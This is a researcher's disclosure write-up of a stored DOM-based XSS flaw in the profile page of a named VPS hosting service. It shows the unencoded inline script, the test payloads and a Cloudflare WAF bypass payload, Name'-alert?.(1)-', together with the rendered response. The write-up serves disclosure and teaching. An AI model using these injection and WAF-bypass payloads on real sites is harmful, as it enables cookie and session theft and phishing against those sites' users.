Stored DOM-based XSS Vulnerability on VPSServer.com

Stored DOM-based XSS Vulnerability on VPSServer.com

Discovery Details by MD Fahad Hosen

On December 10, 2022, I identified a Stored DOM-based Cross-Site Scripting (XSS) vulnerability on the VPSServer.com platform, which sells Virtual Private Servers (VPS). A Virtual Private Server (VPS) operates as a virtual machine provided as a service by hosting providers, akin to a Virtual Dedicated Server (VDS). Below are the detailed steps of my findings:

Target Page: Profile Page

URL: https://service.vpsserver.com/profile/

Step 1: Source Code Analysis

While inspecting the source code of the profile page, I observed that the UserID, Name, and Email were directly rendered inside <script> tags without proper encoding. The values were enclosed in single quotes ('), creating potential vulnerability points.

Example response snippet:

<script async> dataLayer = [{ 'userID': '1..', 'UserAccountEmail': 'user@email.com', 'UserAccountFullName': 'Name'', 'UserAccountRegistrationDate': '316...', 'UserAccountHash': 'ed2b2...' }]; </script>

Step 2: Testing the Vulnerability

To test the vulnerability, I updated the Name field in my profile and added a single quote (') to it:

Payload:
Name'

Response:
The single quote was directly rendered in the <script> tag without encoding:

'UserAccountFullName': 'Name'',

This confirmed that user input was not being sanitized or properly encoded.

Step 3: Injecting an XSS Payload

I then attempted to inject an XSS payload:

Payload:
Name'-alert(1)-'

However, the request was immediately blocked by Cloudflare WAF (Web Application Firewall) as it detected malicious intent.

Step 4: Bypassing Cloudflare WAF

To bypass Cloudflare WAF, I modified the payload using an encoding technique:

Payload:
Name'-alert?.(1)-'

Response:
Cloudflare WAF allowed the payload, and the response was:

<script async> dataLayer = [{ 'userID': '1..', 'UserAccountEmail': 'user@email.com', 'UserAccountFullName': 'Name'-alert?.(1)-'', 'UserAccountRegistrationDate': '316...', 'UserAccountHash': 'ed2b2...' }]; </script>

Vulnerability Explanation

The payload was stored in the server and rendered in the browser without proper encoding, allowing malicious scripts to execute in the browser's DOM. This confirmed a Stored DOM-based XSS vulnerability.

Impact

Attackers exploiting this vulnerability can execute arbitrary JavaScript in the victim’s browser, potentially leading to:

• Stealing Sensitive Information: Cookies, session tokens, or user credentials.

• Defacing the Website: Injecting malicious content.

• Phishing Attacks: Redirecting users to malicious websites.

Reference

Inspired by techniques shared on Brutelogic's Blog.

Personal Details:

• Researcher: MD Fahad Hosen

This report demonstrates the importance of sanitizing and encoding user inputs to prevent XSS vulnerabilities.